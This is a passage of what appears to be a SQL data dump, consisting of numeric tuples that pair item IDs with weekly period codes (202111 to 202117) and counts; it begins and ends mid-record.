'202111',7),(481,1,'202111',7),(1770,1,'202111',7),(2063,1,'202111',7),(2297,1,'202111',7),(2558,1,'202111',7),(2617,1,'202111',7),(2658,1,'202111',7),(3006,1,'202111',7),(3097,1,'202111',7),(3104,1,'202111',7),(3107,1,'202111',7),(3251,1,'202111',7),(3267,1,'202111',7),(469,1,'202111',8),(484,1,'202111',8),(487,1,'202111',8),(488,1,'202111',8),(1709,1,'202111',8),(1715,1,'202111',8),(1766,1,'202111',8),(1774,1,'202111',8),(2161,1,'202111',8),(3005,1,'202111',8),(1699,1,'202111',9),(1713,1,'202111',9),(2804,1,'202111',9),(3092,1,'202111',9),(3127,1,'202111',9),(468,1,'202111',10),(3034,1,'202111',10),(3259,1,'202111',10),(467,1,'202111',11),(470,1,'202111',11),(1610,1,'202111',11),(1720,1,'202111',11),(2178,1,'202111',11),(2751,1,'202111',11),(2911,1,'202111',11),(3038,1,'202111',11),(1718,1,'202111',12),(2801,1,'202111',12),(2989,1,'202111',12),(1608,1,'202111',13),(1588,1,'202111',14),(1596,1,'202111',14),(2609,1,'202111',14),(3083,1,'202111',14),(1592,1,'202111',15),(3531,1,'202111',15),(3072,1,'202111',16),(3287,1,'202111',16),(3285,1,'202111',17),(335,1,'202111',18),(1544,1,'202111',18),(3282,1,'202111',18),(74,1,'202111',19),(570,1,'202111',19),(3498,1,'202111',19),(3541,1,'202111',19),(2159,1,'202111',20),(1612,1,'202111',21),(3489,1,'202111',21),(1604,1,'202111',22),(2813,1,'202111',22),(2457,1,'202111',23),(3534,1,'202111',23),(1594,1,'202111',24),(1598,1,'202111',24),(3030,1,'202111',24),(1606,1,'202111',25),(84,1,'202111',26),(108,1,'202111',26),(1614,1,'202111',27),(2904,1,'202111',27),(87,1,'202111',29),(1602,1,'202111',30),(2503,1,'202111',30),(72,1,'202111',31),(2769,1,'202111',31),(1582,1,'202111',35),(76,1,'202111',36),(89,1,'202111',36),(2309,1,'202111',36),(1600,1,'202111',39),(68,1,'202111',41),(91,1,'202111',47),(80,1,'202111',59),(1586,1,'202111',71),(9,1,'202111',925),(479,1,'202112',1),(3240,1,'202112',1),(3486,1,'202112',1),(106,1,'202112',2),(469,1,'202112',2),(476,1,'202112',2),(477,1,'202112',2),(482,1,'202112',2),(483,1,'202112',2),(486,1,'202112',2),(1695,1,'202112',2),(1701,1,'202112',2),(1703,1,'202112',2),(1711,1,'202112',2),(1720,1,'202112',2),(1722,1,'202112',2),(1724,1,'202112',2),(1737,1,'202112',2),(1745,1,'202112',2),(1747,1,'202112',2),(1749,1,'202112',2),(1776,1,'202112',2),(1780,1,'202112',2),(2150,1,'202112',2),(2956,1,'202112',2),(2991,1,'202112',2),(2993,1,'202112',2),(3090,1,'202112',2),(3243,1,'202112',2),(3247,1,'202112',2),(3275,1,'202112',2),(3438,1,'202112',2),(102,1,'202112',3),(110,1,'202112',3),(478,1,'202112',3),(480,1,'202112',3),(484,1,'202112',3),(1697,1,'202112',3),(1699,1,'202112',3),(1705,1,'202112',3),(1707,1,'202112',3),(1715,1,'202112',3),(1726,1,'202112',3),(1734,1,'202112',3),(1751,1,'202112',3),(1768,1,'202112',3),(2152,1,'202112',3),(2156,1,'202112',3),(2704,1,'202112',3),(2965,1,'202112',3),(3023,1,'202112',3),(3038,1,'202112',3),(3063,1,'202112',3),(3066,1,'202112',3),(3072,1,'202112',3),(3079,1,'202112',3),(3096,1,'202112',3),(3107,1,'202112',3),(3229,1,'202112',3),(3251,1,'202112',3),(472,1,'202112',4),(487,1,'202112',4),(1709,1,'202112',4),(1730,1,'202112',4),(1732,1,'202112',4),(1770,1,'202112',4),(1772,1,'202112',4),(1782,1,'202112',4),(2161,1,'202112',4),(2178,1,'202112',4),(2248,1,'202112',4),(2293,1,'202112',4),(2296,1,'202112',4),(2809,1,'202112',4),(2813,1,'202112',4),(3004,1,'202112',4),(3005,1,'202112',4),(3006,1,'202112',4),(3045,1,'202112',4),(3092,1,'202112',4),(3104,1,'202112',4),(3117,1,'202112',4),(3226,1,'202112',4),(3245,1,'202112',4),(3249,1,'202112',4),(3261,1,'202112',4),(3263,1,'202112',4),(3265,1,'202112',4),(3269,1,'202112',4),(3297,1,'202112',4),(3316,1,'202112',4),(471,1,'202112',5),(485,1,'202112',5),(488,1,'202112',5),(1584,1,'202112',5),(1728,1,'202112',5),(1739,1,'202112',5),(1743,1,'202112',5),(1774,1,'202112',5),(1778,1,'202112',5),(2063,1,'202112',5),(2252,1,'202112',5),(2558,1,'202112',5),(2658,1,'202112',5),(2748,1,'202112',5),(2911,1,'202112',5),(3027,1,'202112',5),(3083,1,'202112',5),(3102,1,'202112',5),(3273,1,'202112',5),(3278,1,'202112',5),(3290,1,'202112',5),(3313,1,'202112',5),(481,1,'202112',6),(1590,1,'202112',6),(1741,1,'202112',6),(1766,1,'202112',6),(2148,1,'202112',6),(2165,1,'202112',6),(2617,1,'202112',6),(2751,1,'202112',6),(2964,1,'202112',6),(3034,1,'202112',6),(3041,1,'202112',6),(3069,1,'202112',6),(3097,1,'202112',6),(3124,1,'202112',6),(3267,1,'202112',6),(470,1,'202112',7),(474,1,'202112',7),(2801,1,'202112',7),(2804,1,'202112',7),(3087,1,'202112',7),(3259,1,'202112',7),(3280,1,'202112',7),(1592,1,'202112',8),(1713,1,'202112',8),(3109,1,'202112',8),(3257,1,'202112',8),(3271,1,'202112',8),(3307,1,'202112',8),(3430,1,'202112',8),(468,1,'202112',9),(1718,1,'202112',9),(2989,1,'202112',9),(3253,1,'202112',9),(1610,1,'202112',10),(2297,1,'202112',10),(3060,1,'202112',10),(3482,1,'202112',10),(1588,1,'202112',11),(1614,1,'202112',11),(3479,1,'202112',11),(473,1,'202112',12),(3282,1,'202112',12),(3285,1,'202112',12),(570,1,'202112',13),(1544,1,'202112',13),(2775,1,'202112',13),(2154,1,'202112',14),(2609,1,'202112',14),(3287,1,'202112',14),(3541,1,'202112',14),(84,1,'202112',15),(1608,1,'202112',15),(3127,1,'202112',15),(1596,1,'202112',16),(1606,1,'202112',16),(2904,1,'202112',16),(3498,1,'202112',16),(467,1,'202112',17),(1612,1,'202112',17),(335,1,'202112',18),(2503,1,'202112',18),(72,1,'202112',19),(2457,1,'202112',19),(89,1,'202112',20),(1598,1,'202112',20),(74,1,'202112',21),(1582,1,'202112',21),(3030,1,'202112',21),(3531,1,'202112',21),(108,1,'202112',22),(3534,1,'202112',22),(87,1,'202112',23),(1604,1,'202112',24),(2159,1,'202112',24),(76,1,'202112',25),(1594,1,'202112',25),(3489,1,'202112',25),(68,1,'202112',26),(2769,1,'202112',38),(1602,1,'202112',39),(2309,1,'202112',40),(1600,1,'202112',41),(91,1,'202112',42),(80,1,'202112',46),(1586,1,'202112',48),(9,1,'202112',659),(106,1,'202113',1),(1743,1,'202113',1),(3229,1,'202113',1),(3257,1,'202113',1),(110,1,'202113',2),(478,1,'202113',2),(482,1,'202113',2),(1697,1,'202113',2),(1701,1,'202113',2),(1705,1,'202113',2),(1711,1,'202113',2),(1739,1,'202113',2),(1747,1,'202113',2),(1751,1,'202113',2),(1772,1,'202113',2),(2150,1,'202113',2),(2152,1,'202113',2),(2248,1,'202113',2),(3271,1,'202113',2),(3290,1,'202113',2),(469,1,'202113',3),(477,1,'202113',3),(483,1,'202113',3),(488,1,'202113',3),(1699,1,'202113',3),(1707,1,'202113',3),(1713,1,'202113',3),(1715,1,'202113',3),(1720,1,'202113',3),(1728,1,'202113',3),(1730,1,'202113',3),(1737,1,'202113',3),(1766,1,'202113',3),(1768,1,'202113',3),(1770,1,'202113',3),(2252,1,'202113',3),(2813,1,'202113',3),(2965,1,'202113',3),(3004,1,'202113',3),(3090,1,'202113',3),(3096,1,'202113',3),(3109,1,'202113',3),(3124,1,'202113',3),(3247,1,'202113',3),(3261,1,'202113',3),(3263,1,'202113',3),(3267,1,'202113',3),(3273,1,'202113',3),(3280,1,'202113',3),(3307,1,'202113',3),(102,1,'202113',4),(484,1,'202113',4),(1590,1,'202113',4),(1703,1,'202113',4),(1718,1,'202113',4),(1722,1,'202113',4),(1741,1,'202113',4),(2063,1,'202113',4),(2156,1,'202113',4),(2159,1,'202113',4),(2293,1,'202113',4),(2296,1,'202113',4),(2809,1,'202113',4),(2911,1,'202113',4),(2991,1,'202113',4),(3087,1,'202113',4),(3117,1,'202113',4),(3240,1,'202113',4),(3245,1,'202113',4),(3251,1,'202113',4),(3265,1,'202113',4),(3278,1,'202113',4),(470,1,'202113',5),(472,1,'202113',5),(473,1,'202113',5),(474,1,'202113',5),(479,1,'202113',5),(480,1,'202113',5),(485,1,'202113',5),(486,1,'202113',5),(1732,1,'202113',5),(1734,1,'202113',5),(1745,1,'202113',5),(1776,1,'202113',5),(1778,1,'202113',5),(1782,1,'202113',5),(2165,1,'202113',5),(2178,1,'202113',5),(2297,1,'202113',5),(2558,1,'202113',5),(2617,1,'202113',5),(2804,1,'202113',5),(2964,1,'202113',5),(2993,1,'202113',5),(3006,1,'202113',5),(3023,1,'202113',5),(3027,1,'202113',5),(3069,1,'202113',5),(3079,1,'202113',5),(3092,1,'202113',5),(3097,1,'202113',5),(3249,1,'202113',5),(3275,1,'202113',5),(468,1,'202113',6),(471,1,'202113',6),(481,1,'202113',6),(1709,1,'202113',6),(1724,1,'202113',6),(1780,1,'202113',6),(2751,1,'202113',6),(2956,1,'202113',6),(3041,1,'202113',6),(3060,1,'202113',6),(3063,1,'202113',6),(3253,1,'202113',6),(3438,1,'202113',6),(3479,1,'202113',6),(487,1,'202113',7),(1606,1,'202113',7),(2658,1,'202113',7),(2989,1,'202113',7),(3038,1,'202113',7),(3083,1,'202113',7),(3104,1,'202113',7),(3107,1,'202113',7),(3243,1,'202113',7),(3259,1,'202113',7),(3269,1,'202113',7),(3297,1,'202113',7),(3316,1,'202113',7),(476,1,'202113',8),(1695,1,'202113',8),(1726,1,'202113',8),(1749,1,'202113',8),(2148,1,'202113',8),(2154,1,'202113',8),(2161,1,'202113',8),(2775,1,'202113',8),(3005,1,'202113',8),(3066,1,'202113',8),(3102,1,'202113',8),(3127,1,'202113',8),(3482,1,'202113',8),(2609,1,'202113',9),(2801,1,'202113',9),(3034,1,'202113',9),(3313,1,'202113',9),(3486,1,'202113',9),(1584,1,'202113',10),(1592,1,'202113',10),(2748,1,'202113',10),(3030,1,'202113',10),(3226,1,'202113',10),(3430,1,'202113',10),(1588,1,'202113',11),(1610,1,'202113',11),(3045,1,'202113',11),(3072,1,'202113',11),(1544,1,'202113',12),(1614,1,'202113',12),(3287,1,'202113',12),(467,1,'202113',13),(1604,1,'202113',13),(1774,1,'202113',13),(2704,1,'202113',13),(3285,1,'202113',14),(74,1,'202113',15),(3498,1,'202113',15),(3541,1,'202113',16),(108,1,'202113',17),(3534,1,'202113',17),(570,1,'202113',18),(3282,1,'202113',18),(335,1,'202113',19),(2457,1,'202113',19),(3489,1,'202113',19),(84,1,'202113',20),(1598,1,'202113',20),(1608,1,'202113',20),(1612,1,'202113',20),(89,1,'202113',21),(2503,1,'202113',21),(2904,1,'202113',21),(3531,1,'202113',21),(72,1,'202113',23),(2769,1,'202113',24),(87,1,'202113',25),(1582,1,'202113',25),(76,1,'202113',26),(1596,1,'202113',27),(1602,1,'202113',27),(1594,1,'202113',29),(2309,1,'202113',30),(68,1,'202113',31),(1600,1,'202113',41),(91,1,'202113',43),(80,1,'202113',45),(1586,1,'202113',47),(9,1,'202113',427),(106,1,'202114',1),(110,1,'202114',1),(102,1,'202114',4),(1728,1,'202114',4),(1772,1,'202114',4),(3275,1,'202114',4),(479,1,'202114',5),(1705,1,'202114',5),(1715,1,'202114',5),(1724,1,'202114',5),(1734,1,'202114',5),(1749,1,'202114',5),(1766,1,'202114',5),(2150,1,'202114',5),(2748,1,'202114',5),(2964,1,'202114',5),(2965,1,'202114',5),(3004,1,'202114',5),(3063,1,'202114',5),(3069,1,'202114',5),(3087,1,'202114',5),(3090,1,'202114',5),(3124,1,'202114',5),(3247,1,'202114',5),(476,1,'202114',6),(478,1,'202114',6),(481,1,'202114',6),(486,1,'202114',6),(1584,1,'202114',6),(1695,1,'202114',6),(1699,1,'202114',6),(1701,1,'202114',6),(1703,1,'202114',6),(1711,1,'202114',6),(1713,1,'202114',6),(1720,1,'202114',6),(1730,1,'202114',6),(1739,1,'202114',6),(1741,1,'202114',6),(1745,1,'202114',6),(2152,1,'202114',6),(2156,1,'202114',6),(2165,1,'202114',6),(3023,1,'202114',6),(3045,1,'202114',6),(3066,1,'202114',6),(3096,1,'202114',6),(3245,1,'202114',6),(3265,1,'202114',6),(3271,1,'202114',6),(3280,1,'202114',6),(3307,1,'202114',6),(3482,1,'202114',6),(469,1,'202114',7),(482,1,'202114',7),(485,1,'202114',7),(488,1,'202114',7),(1707,1,'202114',7),(1768,1,'202114',7),(1778,1,'202114',7),(2063,1,'202114',7),(2178,1,'202114',7),(2248,1,'202114',7),(2293,1,'202114',7),(2989,1,'202114',7),(3027,1,'202114',7),(3060,1,'202114',7),(3104,1,'202114',7),(3117,1,'202114',7),(3257,1,'202114',7),(3259,1,'202114',7),(3297,1,'202114',7),(3313,1,'202114',7),(3486,1,'202114',7),(472,1,'202114',8),(484,1,'202114',8),(1590,1,'202114',8),(1732,1,'202114',8),(1743,1,'202114',8),(1751,1,'202114',8),(2252,1,'202114',8),(2297,1,'202114',8),(2558,1,'202114',8),(2804,1,'202114',8),(2809,1,'202114',8),(2991,1,'202114',8),(2993,1,'202114',8),(3034,1,'202114',8),(3038,1,'202114',8),(3079,1,'202114',8),(3097,1,'202114',8),(3240,1,'202114',8),(3243,1,'202114',8),(3249,1,'202114',8),(3251,1,'202114',8),(3263,1,'202114',8),(3479,1,'202114',8),(471,1,'202114',9),(477,1,'202114',9),(1544,1,'202114',9),(1697,1,'202114',9),(1709,1,'202114',9),(1722,1,'202114',9),(1776,1,'202114',9),(1780,1,'202114',9),(1782,1,'202114',9),(2154,1,'202114',9),(2161,1,'202114',9),(2609,1,'202114',9),(2617,1,'202114',9),(2813,1,'202114',9),(3006,1,'202114',9),(3092,1,'202114',9),(3107,1,'202114',9),(3253,1,'202114',9),(3267,1,'202114',9),(3273,1,'202114',9),(3290,1,'202114',9),(3316,1,'202114',9),(3430,1,'202114',9),(473,1,'202114',10),(474,1,'202114',10),(480,1,'202114',10),(483,1,'202114',10),(1588,1,'202114',10),(1726,1,'202114',10),(1737,1,'202114',10),(1747,1,'202114',10),(1770,1,'202114',10),(2148,1,'202114',10),(2296,1,'202114',10),(2911,1,'202114',10),(3005,1,'202114',10),(3109,1,'202114',10),(3127,1,'202114',10),(3269,1,'202114',10),(3278,1,'202114',10),(3438,1,'202114',10),(470,1,'202114',11),(1718,1,'202114',11),(2658,1,'202114',11),(2751,1,'202114',11),(2775,1,'202114',11),(2801,1,'202114',11),(3102,1,'202114',11),(3226,1,'202114',11),(3229,1,'202114',11),(3261,1,'202114',11),(487,1,'202114',12),(1610,1,'202114',12),(1774,1,'202114',12),(3072,1,'202114',12),(3083,1,'202114',12),(467,1,'202114',13),(3041,1,'202114',13),(1612,1,'202114',14),(3030,1,'202114',14),(1592,1,'202114',16),(1614,1,'202114',16),(2956,1,'202114',16),(2704,1,'202114',17),(3285,1,'202114',17),(3287,1,'202114',17),(3498,1,'202114',17),(468,1,'202114',18),(2904,1,'202114',18),(84,1,'202114',19),(108,1,'202114',20),(1596,1,'202114',20),(1606,1,'202114',20),(2457,1,'202114',20),(74,1,'202114',21),(335,1,'202114',21),(3489,1,'202114',21),(3541,1,'202114',21),(87,1,'202114',22),(89,1,'202114',22),(2159,1,'202114',22),(3282,1,'202114',22),(3531,1,'202114',22),(570,1,'202114',23),(2503,1,'202114',23),(72,1,'202114',24),(68,1,'202114',26),(1598,1,'202114',26),(2769,1,'202114',26),(3534,1,'202114',26),(1608,1,'202114',27),(1604,1,'202114',28),(76,1,'202114',31),(91,1,'202114',31),(2309,1,'202114',31),(1582,1,'202114',33),(1600,1,'202114',38),(1602,1,'202114',40),(1594,1,'202114',41),(80,1,'202114',59),(1586,1,'202114',96),(9,1,'202114',483),(106,1,'202115',1),(110,1,'202115',1),(482,1,'202115',1),(485,1,'202115',1),(488,1,'202115',1),(1737,1,'202115',1),(1739,1,'202115',1),(1741,1,'202115',1),(1770,1,'202115',1),(1776,1,'202115',1),(1780,1,'202115',1),(2165,1,'202115',1),(2293,1,'202115',1),(2296,1,'202115',1),(3063,1,'202115',1),(3104,1,'202115',1),(3257,1,'202115',1),(479,1,'202115',2),(480,1,'202115',2),(483,1,'202115',2),(1697,1,'202115',2),(1703,1,'202115',2),(1713,1,'202115',2),(1730,1,'202115',2),(1768,1,'202115',2),(1772,1,'202115',2),(1778,1,'202115',2),(1782,1,'202115',2),(2152,1,'202115',2),(2991,1,'202115',2),(3069,1,'202115',2),(3090,1,'202115',2),(3097,1,'202115',2),(3229,1,'202115',2),(3240,1,'202115',2),(3245,1,'202115',2),(3316,1,'202115',2),(102,1,'202115',3),(478,1,'202115',3),(484,1,'202115',3),(1584,1,'202115',3),(1590,1,'202115',3),(1707,1,'202115',3),(1715,1,'202115',3),(1722,1,'202115',3),(1724,1,'202115',3),(1734,1,'202115',3),(1751,1,'202115',3),(1766,1,'202115',3),(2063,1,'202115',3),(2148,1,'202115',3),(2161,1,'202115',3),(2178,1,'202115',3),(2252,1,'202115',3),(2658,1,'202115',3),(2775,1,'202115',3),(2956,1,'202115',3),(2993,1,'202115',3),(3066,1,'202115',3),(3096,1,'202115',3),(3107,1,'202115',3),(3109,1,'202115',3),(3127,1,'202115',3),(3226,1,'202115',3),(3247,1,'202115',3),(3249,1,'202115',3),(3263,1,'202115',3),(3267,1,'202115',3),(3269,1,'202115',3),(3271,1,'202115',3),(3280,1,'202115',3),(3430,1,'202115',3),(477,1,'202115',4),(1699,1,'202115',4),(1701,1,'202115',4),(1705,1,'202115',4),(1711,1,'202115',4),(1720,1,'202115',4),(1749,1,'202115',4),(2558,1,'202115',4),(2748,1,'202115',4),(2964,1,'202115',4),(2965,1,'202115',4),(3023,1,'202115',4),(3251,1,'202115',4),(3259,1,'202115',4),(3307,1,'202115',4),(3313,1,'202115',4),(3486,1,'202115',4),(471,1,'202115',5),(476,1,'202115',5),(486,1,'202115',5),(1709,1,'202115',5),(1728,1,'202115',5),(1743,1,'202115',5),(1745,1,'202115',5),(1747,1,'202115',5),(1774,1,'202115',5),(2248,1,'202115',5),(2751,1,'202115',5),(2809,1,'202115',5),(2911,1,'202115',5),(3045,1,'202115',5),(3072,1,'202115',5),(3092,1,'202115',5),(3261,1,'202115',5),(3290,1,'202115',5),(3297,1,'202115',5),(3479,1,'202115',5),(3482,1,'202115',5),(474,1,'202115',6),(2156,1,'202115',6),(2804,1,'202115',6),(2989,1,'202115',6),(3083,1,'202115',6),(3087,1,'202115',6),(3265,1,'202115',6),(3273,1,'202115',6),(3275,1,'202115',6),(469,1,'202115',7),(473,1,'202115',7),(2154,1,'202115',7),(2609,1,'202115',7),(2801,1,'202115',7),(2813,1,'202115',7),(3004,1,'202115',7),(3006,1,'202115',7),(3117,1,'202115',7),(487,1,'202115',8),(1610,1,'202115',8),(1726,1,'202115',8),(2159,1,'202115',8),(2704,1,'202115',8),(3005,1,'202115',8),(3438,1,'202115',8),(472,1,'202115',9),(2150,1,'202115',9),(3027,1,'202115',9),(3034,1,'202115',9),(3079,1,'202115',9),(3102,1,'202115',9),(3243,1,'202115',9),(470,1,'202115',10),(2297,1,'202115',10),(3253,1,'202115',10),(481,1,'202115',11),(1592,1,'202115',11),(1695,1,'202115',11),(3030,1,'202115',11),(3038,1,'202115',11),(3041,1,'202115',11),(1544,1,'202115',12),(1606,1,'202115',12),(3060,1,'202115',13),(1588,1,'202115',14),(1604,1,'202115',15),(1612,1,'202115',15),(2457,1,'202115',15),(467,1,'202115',16),(468,1,'202115',16),(1598,1,'202115',16),(2617,1,'202115',16),(1596,1,'202115',17),(1614,1,'202115',19),(1718,1,'202115',19),(1582,1,'202115',21),(3285,1,'202115',21),(335,1,'202115',22),(3287,1,'202115',22),(2503,1,'202115',23),(2904,1,'202115',23),(570,1,'202115',24),(1608,1,'202115',25),(3498,1,'202115',25),(74,1,'202115',26),(72,1,'202115',27),(2309,1,'202115',27),(3489,1,'202115',27),(84,1,'202115',28),(3541,1,'202115',29),(89,1,'202115',30),(1602,1,'202115',30),(3531,1,'202115',31),(3534,1,'202115',31),(87,1,'202115',32),(108,1,'202115',33),(76,1,'202115',34),(91,1,'202115',34),(1594,1,'202115',35),(1600,1,'202115',38),(68,1,'202115',39),(3282,1,'202115',40),(2769,1,'202115',48),(80,1,'202115',60),(1586,1,'202115',86),(9,1,'202115',459),(110,1,'202116',1),(476,1,'202116',1),(477,1,'202116',1),(478,1,'202116',1),(1701,1,'202116',1),(1734,1,'202116',1),(2296,1,'202116',1),(2658,1,'202116',1),(3041,1,'202116',1),(3109,1,'202116',1),(3249,1,'202116',1),(3275,1,'202116',1),(3316,1,'202116',1),(479,1,'202116',2),(480,1,'202116',2),(482,1,'202116',2),(483,1,'202116',2),(486,1,'202116',2),(1695,1,'202116',2),(1720,1,'202116',2),(1730,1,'202116',2),(1737,1,'202116',2),(1743,1,'202116',2),(1747,1,'202116',2),(2252,1,'202116',2),(2965,1,'202116',2),(2991,1,'202116',2),(3023,1,'202116',2),(3034,1,'202116',2),(3066,1,'202116',2),(3247,1,'202116',2),(3253,1,'202116',2),(3267,1,'202116',2),(102,1,'202116',3),(484,1,'202116',3),(488,1,'202116',3),(1705,1,'202116',3),(1715,1,'202116',3),(1739,1,'202116',3),(1745,1,'202116',3),(1749,1,'202116',3),(1782,1,'202116',3),(2156,1,'202116',3),(2748,1,'202116',3),(2801,1,'202116',3),(2993,1,'202116',3),(3069,1,'202116',3),(3096,1,'202116',3),(3104,1,'202116',3),(3107,1,'202116',3),(3229,1,'202116',3),(3240,1,'202116',3),(3257,1,'202116',3),(3259,1,'202116',3),(3265,1,'202116',3),(3297,1,'202116',3),(3430,1,'202116',3),(3482,1,'202116',3),(3486,1,'202116',3),(469,1,'202116',4),(485,1,'202116',4),(1584,1,'202116',4),(1707,1,'202116',4),(1711,1,'202116',4),(1724,1,'202116',4),(1751,1,'202116',4),(1766,1,'202116',4),(1768,1,'202116',4),(1772,1,'202116',4),(1774,1,'202116',4),(2161,1,'202116',4),(2178,1,'202116',4),(2558,1,'202116',4),(2609,1,'202116',4),(2911,1,'202116',4),(3063,1,'202116',4),(3072,1,'202116',4),(3087,1,'202116',4),(3090,1,'202116',4),(3092,1,'202116',4),(3124,1,'202116',4),(3127,1,'202116',4),(3263,1,'202116',4),(3269,1,'202116',4),(3271,1,'202116',4),(3273,1,'202116',4),(3278,1,'202116',4),(3438,1,'202116',4),(481,1,'202116',5),(1699,1,'202116',5),(1709,1,'202116',5),(1713,1,'202116',5),(1722,1,'202116',5),(1732,1,'202116',5),(1741,1,'202116',5),(2063,1,'202116',5),(2148,1,'202116',5),(2152,1,'202116',5),(2154,1,'202116',5),(2293,1,'202116',5),(2775,1,'202116',5),(2809,1,'202116',5),(2813,1,'202116',5),(3006,1,'202116',5),(3027,1,'202116',5),(3038,1,'202116',5),(3045,1,'202116',5),(3097,1,'202116',5),(3117,1,'202116',5),(3226,1,'202116',5),(3245,1,'202116',5),(3280,1,'202116',5),(3290,1,'202116',5),(3307,1,'202116',5),(3479,1,'202116',5),(474,1,'202116',6),(1544,1,'202116',6),(1697,1,'202116',6),(1718,1,'202116',6),(1728,1,'202116',6),(1778,1,'202116',6),(1780,1,'202116',6),(2165,1,'202116',6),(2617,1,'202116',6),(2804,1,'202116',6),(2964,1,'202116',6),(2989,1,'202116',6),(3083,1,'202116',6),(3102,1,'202116',6),(3243,1,'202116',6),(470,1,'202116',7),(473,1,'202116',7),(1770,1,'202116',7),(3004,1,'202116',7),(3079,1,'202116',7),(471,1,'202116',8),(472,1,'202116',8),(1604,1,'202116',8),(1612,1,'202116',8),(1726,1,'202116',8),(2297,1,'202116',8),(3030,1,'202116',8),(3251,1,'202116',8),(3313,1,'202116',8),(468,1,'202116',9),(570,1,'202116',9),(1590,1,'202116',9),(1776,1,'202116',9),(2150,1,'202116',9),(2159,1,'202116',9),(2248,1,'202116',9),(2751,1,'202116',9),(3285,1,'202116',9),(1610,1,'202116',11),(2704,1,'202116',11),(2956,1,'202116',11),(3005,1,'202116',11),(74,1,'202116',12),(1598,1,'202116',12),(1608,1,'202116',12),(3261,1,'202116',12),(3287,1,'202116',12),(3489,1,'202116',12),(3498,1,'202116',12),(487,1,'202116',13),(1588,1,'202116',13),(1614,1,'202116',13),(84,1,'202116',14),(1596,1,'202116',14),(3060,1,'202116',14),(108,1,'202116',15),(335,1,'202116',15),(2457,1,'202116',15),(2904,1,'202116',15),(3282,1,'202116',15),(467,1,'202116',16),(1592,1,'202116',16),(1606,1,'202116',16),(3541,1,'202116',16),(89,1,'202116',17),(2503,1,'202116',17),(76,1,'202116',18),(3531,1,'202116',18),(2309,1,'202116',19),(87,1,'202116',20),(1582,1,'202116',20),(2769,1,'202116',21),(72,1,'202116',22),(3534,1,'202116',22),(68,1,'202116',23),(91,1,'202116',28),(1600,1,'202116',29),(1602,1,'202116',33),(80,1,'202116',35),(1594,1,'202116',37),(1586,1,'202116',65),(9,1,'202116',460),(2965,1,'202117',1),(102,1,'202117',2),(478,1,'202117',2),(482,1,'202117',2),(483,1,'202117',2),(1741,1,'202117',2),(1747,1,'202117',2),(1772,1,'202117',2),(3041,1,'202117',2),(3243,1,'202117',2),(3245,1,'202117',2),(484,1,'202117',3),(1697,1,'202117',3),(1722,1,'202117',3),(1730,1,'202117',3),(1734,1,'202117',3),(1737,1,'202117',3),(1751,1,'202117',3),(1776,1,'202117',3),(1778,1,'202117',3),(2152,1,'202117',3),(2293,1,'202117',3),(2964,1,'202117',3),(2993,1,'202117',3),(3063,1,'202117',3),(3102,1,'202117',3),(3124,1,'202117',3),(3240,1,'202117',3),(3257,1,'202117',3),(3273,1,'202117',3),(3275,1,'202117',3),(474,1,'202117',4),(1699,1,'202117',4),(1713,1,'202117',4),(1732,1,'202117',4),(1743,1,'202117',4),(2150,1,'202117',4),(2156,1,'202117',4),(2296,1,'202117',4),(2813,1,'202117',4),(3006,1,'202117',4),(3090,1,'202117',4),(3226,1,'202117',4),(3229,1,'202117',4),(3249,1,'202117',4),(3261,1,'202117',4),(3263,1,'202117',4),(3265,1,'202117',4),(3267,1,'202117',4),(3271,1,'202117',4),(3278,1,'202117',4),(3307,1,'202117',4),(471,1,'202117',5),(473,1,'202117',5),(479,1,'202117',5),(1584,1,'202117',5),(1590,1,'202117',5),(1695,1,'202117',5),(1701,1,'202117',5),(1707,1,'202117',5),(1724,1,'202117',5),(1739,1,'202117',5),(1745,1,'202117',5),(1768,1,'202117',5),(1780,1,'202117',5),(1782,1,'202117',5),(2148,1,'202117',5),(2161,1,'202117',5),(2165,1,'202117',5),(2248,1,'202117',5),(2252,1,'202117',5),(2748,1,'202117',5),(2751,1,'202117',5),(3004,1,'202117',5),(3034,1,'202117',5),(3087,1,'202117',5),(3096,1,'202117',5),(3117,1,'202117',5),(3253,1,'202117',5),(3269,1,'202117',5),(3280,1,'202117',5),(470,1,'202117',6),(472,1,'202117',6),(476,1,'202117',6),(477,1,'202117',6),(486,1,'202117',6),(488,1,'202117',6),(1774,1,'202117',6),(2063,1,'202117',6),(2178,1,'202117',6),(2609,1,'202117',6),(2658,1,'202117',6),(3069,1,'202117',6),(3107,1,'202117',6),(3251,1,'202117',6),(3259,1,'202117',6),(3297,1,'202117',6),(3313,1,'202117',6),(3316,1,'202117',6),(3486,1,'202117',6),(469,1,'202117',7),(485,1,'202117',7),(1703,1,'202117',7),(1705,1,'202117',7),(1709,1,'202117',7),(1726,1,'202117',7),(1749,1,'202117',7),(2154,1,'202117',7),(2558,1,'202117',7),(2704,1,'202117',7),(2775,1,'202117',7),(2956,1,'202117',7),(2991,1,'202117',7),(3005,1,'202117',7),(3045,1,'202117',7),(3066,1,'202117',7),(3079,1,'202117',7),(3083,1,'202117',7),(3109,1,'202117',7),(3290,1,'202117',7),(3479,1,'202117',7),(480,1,'202117',8),(1711,1,'202117',8),(2617,1,'202117',8),(2769,1,'202117',8),(2911,1,'202117',8),(2989,1,'202117',8),(3092,1,'202117',8),(3104,1,'202117',8),(481,1,'202117',9),(487,1,'202117',9),(1544,1,'202117',9),(1610,1,'202117',9),(1715,1,'202117',9),(3027,1,'202117',9),(3072,1,'202117',9),(3097,1,'202117',9),(3247,1,'202117',9),(3430,1,'202117',9),(3482,1,'202117',9),(570,1,'202117',10),(1720,1,'202117',10),(1728,1,'202117',10),(2801,1,'202117',10),(2809,1,'202117',10),(3023,1,'202117',10),(3038,1,'202117',10),(3060,1,'202117',10),(3127,1,'202117',10),(3438,1,'202117',10),(1766,1,'202117',11),(1770,1,'202117',11),(467,1,'202117',12),(1604,1,'202117',12),(1606,1,'202117',12),(1718,1,'202117',12),(2159,1,'202117',12),(2804,1,'202117',12),(468,1,'202117',13),(1598,1,'202117',13),(1612,1,'202117',13),(3030,1,'202117',13),(1588,1,'202117',14),(1596,1,'202117',14),(2297,1,'202117',15),(1582,1,'202117',18),(3282,1,'202117',18),(3489,1,'202117',18),(335,1,'202117',19),(1608,1,'202117',20),(1614,1,'202117',20),(2457,1,'202117',20),(3285,1,'202117',20),(3287,1,'202117',20),(3498,1,'202117',21),(3541,1,'202117',21),(1592,1,'202117',22),(3531,1,'202117',23),(89,1,'202117',24),(84,1,'202117',25),(2309,1,'202117',26),(2503,1,'202117',26),(2904,1,'202117',29),(3534,1,'202117',29),(74,1,'202117',30),(108,1,'202117',30),(87,1,'202117',34),(72,1,'202117',36),(76,1,'202117',39),(91,1,'202117',43),(1594